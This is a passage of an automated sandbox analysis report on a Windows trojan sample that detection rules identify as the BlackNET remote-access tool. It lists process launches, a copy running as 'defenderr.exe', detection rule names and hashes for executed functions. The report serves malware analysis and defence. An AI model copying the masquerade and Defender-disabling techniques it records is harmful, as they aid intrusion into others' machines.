Yara matches:	Rule: JoeSecurity_BlackNET, Description: Yara detected BlackNET, Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_DisableWinDefender, Description: Detects executables containing artifcats associated with disabling Widnows Defender, Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_BlackNET, Description: Detects BlackNET RAT, Source: 00000005.00000002.425501198.0000000002DA0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 49%, ReversingLabs
Reputation:	low

Show Windows behavior

Target ID:	6
Start time:	09:33:27
Start date:	18/06/2023
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4196 -s 3296
Imagebase:	0x7ff679980000
File size:	494488 bytes
MD5 hash:	2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Target ID:	10
Start time:	09:33:35
Start date:	18/06/2023
Path:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe"
Imagebase:	0x960000
File size:	187904 bytes
MD5 hash:	D677C626953C9BA17B3D094A83B1048E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	11
Start time:	09:33:43
Start date:	18/06/2023
Path:	C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe"
Imagebase:	0xc60000
File size:	187904 bytes
MD5 hash:	D677C626953C9BA17B3D094A83B1048E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	13
Start time:	09:34:12
Start date:	18/06/2023
Path:	C:\ProgramData\Microsoft\MyClient\defenderr.exe
Wow64 process (32bit):	false
Commandline:	"C:\ProgramData\Microsoft\MyClient\defenderr.exe"
Imagebase:	0x490000
File size:	187904 bytes
MD5 hash:	D677C626953C9BA17B3D094A83B1048E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Show Windows behavior

Target ID:	14
Start time:	09:34:12
Start date:	18/06/2023
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 6648 -s 7384
Imagebase:	0x7ff679980000
File size:	494488 bytes
MD5 hash:	2AFFE478D86272288BBEF5A00BBEF6A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Execution Graph

Execution Coverage:	23.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	10
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFBAC180160 Relevance: 1.0, Instructions: 1004
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3028dcebe812663cd023c3c666bf3c1bd0512270983145eee39df991a862c0f8
Instruction ID: 6bda8c040afd1f8d9822fb54efc2f3d2e2949955b88f3be1016d9aa87f32a01c
Opcode Fuzzy Hash: 3028dcebe812663cd023c3c666bf3c1bd0512270983145eee39df991a862c0f8
Instruction Fuzzy Hash: 3162E4B1B1DA098FD71ADA28C4889B573E2FF95304B20467CD88BC7696DE34F842C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18048D Relevance: .8, Instructions: 809
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c34e4ddd975fa0c175feff9d90e4097a9ccbed070c70a959e6005db0c6e13033
Instruction ID: 87412bb6c3598ab57a1bbca6b69a5fba988ce5d1d4e23243554d72a97a471001
Opcode Fuzzy Hash: c34e4ddd975fa0c175feff9d90e4097a9ccbed070c70a959e6005db0c6e13033
Instruction Fuzzy Hash: 913214B1B1D9494FE74DDB2C84995357BD2EF98301B5442BED84ACB29BDE34E8038784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18A5B6 Relevance: .5, Instructions: 470
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef133ce31e617a44a7eaf9ac4aa5b3e43286a990e0f9e7a5b31a1a880c5138c4
Instruction ID: 52badf0a8bebd6d5964ed93c74155ff18f0f9e11f486d97864866df81f173d52
Opcode Fuzzy Hash: ef133ce31e617a44a7eaf9ac4aa5b3e43286a990e0f9e7a5b31a1a880c5138c4
Instruction Fuzzy Hash: 0AF1A370A0CA4E8FEBA9DF28C8457E937E1FF54310F04426AE84DC7291DB78E9458B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18B362 Relevance: .5, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58f565befa079ac7342c750d2b34c63d027f03127364379bd60211b92525b5bf
Instruction ID: 123b516fc290ebd3a887fa5c55f9a7901151db5e25546aadf3c26a20c1c82195
Opcode Fuzzy Hash: 58f565befa079ac7342c750d2b34c63d027f03127364379bd60211b92525b5bf
Instruction Fuzzy Hash: 60E1C3B0A0CA4E8FEBA9DF28C8957E977D1FB54310F14426ED84DC7291DE78E8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1868AD Relevance: 1.8, APIs: 1, Instructions: 255
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationA.KERNEL32 ref: 00007FFBAC186A70

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: b55f8ccaf3563d387bab8196142ed5afe327c890bad5bd0b161b3aeeeab3d44f
Instruction ID: 249855bded7d3ed9ceb0747d13d59534839386d388c70ace010fbce577e767c7
Opcode Fuzzy Hash: b55f8ccaf3563d387bab8196142ed5afe327c890bad5bd0b161b3aeeeab3d44f
Instruction Fuzzy Hash: C2818170A18A1C8FDB98EF58D845BE9B7F1FF99310F1081AAD44DD3251CA74A986CF81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC185D16 Relevance: 1.7, APIs: 1, Instructions: 218
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32 ref: 00007FFBAC185E8C

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a8ae070d53ad2f2074eccfe95bbdb1c1e07d47de3e55f63dfb2401716c8ee817
Instruction ID: d6f3fcd9b833c4f14827a413967ae0498d7a14106c17731854d9b2ec2cc26f98
Opcode Fuzzy Hash: a8ae070d53ad2f2074eccfe95bbdb1c1e07d47de3e55f63dfb2401716c8ee817
Instruction Fuzzy Hash: 2661D37050CA8D4FEB9ADF28C8497E57BE1FB59310F04416AE88DC7252CA78D885CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC18DBCD Relevance: 1.6, APIs: 1, Instructions: 126
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32 ref: 00007FFBAC18DC81

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 4af99604a903f65ee75f5a07a2caaf6b2f2074aa7f1c829c8cff7c60fa304a7d
Instruction ID: 5819edebf02e853ac4d5d6a6afe3cb0c5c1bf4ffb65a75c0b4c8f0910ce8f22a
Opcode Fuzzy Hash: 4af99604a903f65ee75f5a07a2caaf6b2f2074aa7f1c829c8cff7c60fa304a7d
Instruction Fuzzy Hash: C731D571A1CA1D8FDB58EB5CD84A6B97BE1EB99311F00427ED00AD3252DB71A812CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC06F5A0 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.467785940.00007FFBAC06D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC06D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac06d000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ccd054c9fc062df7d63167767061ea2e88276eecf895b9f8d5a1233fea4eb8b
Instruction ID: f90697a71e8fe25bd59d96ad6641f62b0d07750d10e65e3510c21b18743f8c1f
Opcode Fuzzy Hash: 6ccd054c9fc062df7d63167767061ea2e88276eecf895b9f8d5a1233fea4eb8b
Instruction Fuzzy Hash: AB41DEB140DBC44FE7668B389845AA23FF0EF46320B1505DFE488CB1A3D764A846C7A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFBAC1800F8 Relevance: .4, Instructions: 403COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.468304547.00007FFBAC180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffbac180000_HEUR-Trojan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0587d48d9d596cc73923b76d09d89dff72419bd4ceb82ea3fdd43c3bac9aa36e
Instruction ID: 92efe8d95051c9a8695099e8e8545313232f1cbda80d6b95fddc827a48fec875
Opcode Fuzzy Hash: 0587d48d9d596cc73923b76d09d89dff72419bd4ceb82ea3fdd43c3bac9aa36e
Instruction Fuzzy Hash: B5B18CB1B0E7890FE32B9678D8895717BD1EFA6310B1401BED88AC7193D929E847C395

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 6928, Parent PID: 4196COMMON

Executed Functions

Function 00007FFBAC273065 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504211679.00007FFBAC270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d5d8dac9f55c3b8194645546522da75c50d6a0178db5cf03fbec15e179b90c5
Instruction ID: e058eddcfa6cfe5ce6c630ddc810a1daf2b94e77425a41424256a94d168cc34c
Opcode Fuzzy Hash: 6d5d8dac9f55c3b8194645546522da75c50d6a0178db5cf03fbec15e179b90c5
Instruction Fuzzy Hash: 1F616FF2A0DF594FF7BAE62C94595B577D2EF85320B1401BAC80EC729BDD14EC028685

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC273390 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504211679.00007FFBAC270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30628cb13532e2b92c53bf91d4a0be65ed78093f9da5b1c2db38c8d0d20a60f4
Instruction ID: a00c2c3658292c0198ba6567f25a3ec9fc3df03e3aff8879840e19859828710a
Opcode Fuzzy Hash: 30628cb13532e2b92c53bf91d4a0be65ed78093f9da5b1c2db38c8d0d20a60f4
Instruction Fuzzy Hash: C44126A2A0EB594FE7BBE62C94956B4B7D1DF44320B1800FAC84AD7297DD08EC158791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC2730B1 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504211679.00007FFBAC270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18505600683c3d74afd30281be2a9ada8aca0330cb8de0d108d2ef985277d0c8
Instruction ID: 4630fe0e8c63816951740f37eb74c110cf8a2c364d79e965f5632aaf7ef20356
Opcode Fuzzy Hash: 18505600683c3d74afd30281be2a9ada8aca0330cb8de0d108d2ef985277d0c8
Instruction Fuzzy Hash: 9D3126E2E0EB5A4FF6B6E62C949917477C2EF44310B2900BAC84ED739BCD18EC018695

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A5D98 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.503667719.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac1a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68d6fb4540c753fcdbbaefdb642373dfeda5e2cdfa3f3ce4ed1f49510bffe033
Instruction ID: da38209661a7ea7ff92f2d1826e1547554e65ab10b710ef070f800b2082bf359
Opcode Fuzzy Hash: 68d6fb4540c753fcdbbaefdb642373dfeda5e2cdfa3f3ce4ed1f49510bffe033
Instruction Fuzzy Hash: 7921077090CA4C4FEB59DFACD84A7E97BE0EB96321F04422FD449C3152DA70A41ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC2733DC Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.504211679.00007FFBAC270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac270000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c23a965988dda53036e0f1dee0c76759b7153e75aa04a2875c358cffef1487c7
Instruction ID: d2f64d26ebc16fefe2c8f66aa351fcf81cb702937b85cb870d551aefc164152e
Opcode Fuzzy Hash: c23a965988dda53036e0f1dee0c76759b7153e75aa04a2875c358cffef1487c7
Instruction Fuzzy Hash: 9911ECE3E0E6554FE3BBE62CD4A95B47BD0DF44320B5800FAD84ED7296C918DC118751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A1355 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.503667719.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac1a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07619f96095842d0c0f02c34c889d0c1dabf1ee130f3815c66c06bac9d50aba9
Instruction ID: 3bd623a5c57b303a76eea043da1911f89901d49223e28e45aaff6e501db4decd
Opcode Fuzzy Hash: 07619f96095842d0c0f02c34c889d0c1dabf1ee130f3815c66c06bac9d50aba9
Instruction Fuzzy Hash: 7201677111CB0C8FD744EF0CE455AA6B7E0FF95364F10056DE58AC7661DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A5BE0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.503667719.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ffbac1a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b6019782b910e04f677d2132dc14c6bafad327287da3a73a2be5c6e6652e31
Instruction ID: 96b9532d02924e2083f625314d8c93130ad155bafacb65cba658a94e0cf5b728
Opcode Fuzzy Hash: c1b6019782b910e04f677d2132dc14c6bafad327287da3a73a2be5c6e6652e31
Instruction Fuzzy Hash: E9F0F6B080C6894FDB07DF2888194D57FA0EF16211B040297E459C70A2DB65D858CBD2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: defenderr.exePID: 6640, Parent PID: 4196COMMON

Executed Functions

Function 00007FFBAC1A0160 Relevance: 1.0, Instructions: 1004COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37ac954938fd30ce0d5164aded646604d8ecad50d856abc3748f5aef48017dc2
Instruction ID: bc6726812efdd5f5ff5939e333a3f2c9daac5b4a83034ef1de2b1ec6761e0a06
Opcode Fuzzy Hash: 37ac954938fd30ce0d5164aded646604d8ecad50d856abc3748f5aef48017dc2
Instruction Fuzzy Hash: CD62D3B0719A098FE75AEA28C4889B573E2FF95314B20467DD88FC7696DE35F842C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A048D Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e151885a0bdf79cdf2d4f2614aa0354da8a7fa2415987310919afc69108776
Instruction ID: 996d6acc83b59f46c51497c1c6f1e4b0fb16c05235780f115b1d764623865000
Opcode Fuzzy Hash: 62e151885a0bdf79cdf2d4f2614aa0354da8a7fa2415987310919afc69108776
Instruction Fuzzy Hash: F03204B1B199494FE74EDB2C84995357BD2EF98305B5442BED84FCB297DE24E8038780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A0178 Relevance: 1.5, Strings: 1, Instructions: 239COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC1A0FDE

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: 8b6e96dd63fbf6cce1b46faf9f2302fc35373e0655598d2e1db04a03ff9008a4
Instruction ID: cb493db9b4a6d786847dd39ef6efe567a080c3a7c7d03e5d05642db86d1f8089
Opcode Fuzzy Hash: 8b6e96dd63fbf6cce1b46faf9f2302fc35373e0655598d2e1db04a03ff9008a4
Instruction Fuzzy Hash: BA7148B1B1D6454FE35B9B3988591A1B7D1EF89300F1442BED48FCB2E3ED29E8468381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A0F88 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

gfff, xrefs: 00007FFBAC1A0FDE

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID: gfff
API String ID: 0-1553575800
Opcode ID: f8b754f06aaf1cc66e3f491c4ec763c1ad9cbacf6c25f88521293b89cdcbf0f0
Instruction ID: a47cc062179f40421358bdeb2e084e0c5e3d966580bcf52fd471709ad4b38507
Opcode Fuzzy Hash: f8b754f06aaf1cc66e3f491c4ec763c1ad9cbacf6c25f88521293b89cdcbf0f0
Instruction Fuzzy Hash: 3E21F8A1B29A590FD30ED93E9D450A477D6EBCD301718827DE58BCB396EC24EC168281

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A4341 Relevance: .9, Instructions: 947COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49aa5bfe862c8fa9ebe163614ca6d6cdc3904c249c01883dffd3f671795943e
Instruction ID: 01e097d6ef4da271d27892e6c885ae6fa830fea80c12aa5751bd2ada2269ee04
Opcode Fuzzy Hash: f49aa5bfe862c8fa9ebe163614ca6d6cdc3904c249c01883dffd3f671795943e
Instruction Fuzzy Hash: 14627EA1B0995A8FEB86EB28C4597B973D2FF98300F5405B9D40EC72D6CE39E842C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A37D8 Relevance: .4, Instructions: 401COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd7b20168936b1dda971c039564555390d72c8d496973750726d370462a392b8
Instruction ID: 8acf83633ed01aa2c529846f0cd3ab1501f87ceb1b13a632dbe423796d7e47cc
Opcode Fuzzy Hash: fd7b20168936b1dda971c039564555390d72c8d496973750726d370462a392b8
Instruction Fuzzy Hash: 87D18461A19E5E8AE795FB2CC4996B677E1FF94300F5005B9D04EC32A3DD24A847C760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3439 Relevance: .3, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2425a0f9256c24efc6d0e15a18bd05a9ccc542cb424bdea167ef4e7d9c744fd
Instruction ID: 2d87350565ad420c987a039cda1312d82bf187b7d85469767e658c82df576b29
Opcode Fuzzy Hash: e2425a0f9256c24efc6d0e15a18bd05a9ccc542cb424bdea167ef4e7d9c744fd
Instruction Fuzzy Hash: F891E4A2B0D95E4FEB9BEB3CD4593B977D1EF98211B4401BAD40DC72A2DE18E8068351

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A0C15 Relevance: .3, Instructions: 311COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc4954f7ad2bca588ce6f742b3d16ec74ec00fbb5723dd2c6e901d469460df2
Instruction ID: a9eba564e48c61ff5919263b531c4aa2356c79b197ec7e3c383fa8a511b0b0a6
Opcode Fuzzy Hash: 4bc4954f7ad2bca588ce6f742b3d16ec74ec00fbb5723dd2c6e901d469460df2
Instruction Fuzzy Hash: 0BA1C9A2E1DA4A4EE39BEB7884552B5B790FF94310F0406BAD44FC35A3ED28F445C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3FF5 Relevance: .3, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e3aabb592438c61ad234e01375128f71ed84aa3e6b544d18b88411f37bd611c
Instruction ID: 4171cc22ac7a201526369f24fc50874e68436104d37bb40480f10b2fe2b3120d
Opcode Fuzzy Hash: 4e3aabb592438c61ad234e01375128f71ed84aa3e6b544d18b88411f37bd611c
Instruction Fuzzy Hash: 3E913D707089198FDB99EB2CC459BA977E2FF98700B5545B9E40DC72A6CE34DC42CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A1989 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99ef08edc1421646c5ecd895644b919db241262e75332d6b3aa2d6b9cded8164
Instruction ID: 56569d224bb4ffd721ed83dc8635e35d596c4a557f2d9842fe29147191c1cd8d
Opcode Fuzzy Hash: 99ef08edc1421646c5ecd895644b919db241262e75332d6b3aa2d6b9cded8164
Instruction Fuzzy Hash: 1F5192B0619A198FD71BEB28C4949B173A2FFA4304B6045BDC54FC76A2DE35F846CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A5009 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bb6e2208af1308f5d21b1506cffcd678cb1ba3874a73f6cddc32b5e2951b967
Instruction ID: 999fbd28ace953b82ffc605e592694604998550cabb77b49971beb1032d04823
Opcode Fuzzy Hash: 0bb6e2208af1308f5d21b1506cffcd678cb1ba3874a73f6cddc32b5e2951b967
Instruction Fuzzy Hash: 1851A0B1A1DA5E8FDF96EB68C459AF9B7B1FF45304F1001B9D40ED7292CA34A842CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC08F5A0 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436246391.00007FFBAC08D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC08D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac08d000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea2e6231f340e8e680e1cf02dfe714064d5a629164b4ab4b00d81d5a983ffd4
Instruction ID: 3956dc5201ca9461ccdde88a8e16a147b9b28123df4925dc81577749c688c351
Opcode Fuzzy Hash: 0ea2e6231f340e8e680e1cf02dfe714064d5a629164b4ab4b00d81d5a983ffd4
Instruction Fuzzy Hash: E541D0B140DBC44FD7568B38D845AA23FF0EF56320B1906DFD488CB1A7D724A856C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBAC1A3BE5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.436847728.00007FFBAC1A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAC1A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffbac1a0000_defenderr.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46590626c92aaffeab020d32df9a362d1f1c1d746d983e9affddbde489c078ee
Instruction ID: f73cc439b86ed7df67427d6318a057e509bb09ac9b08a7db946a9867011e6a6c
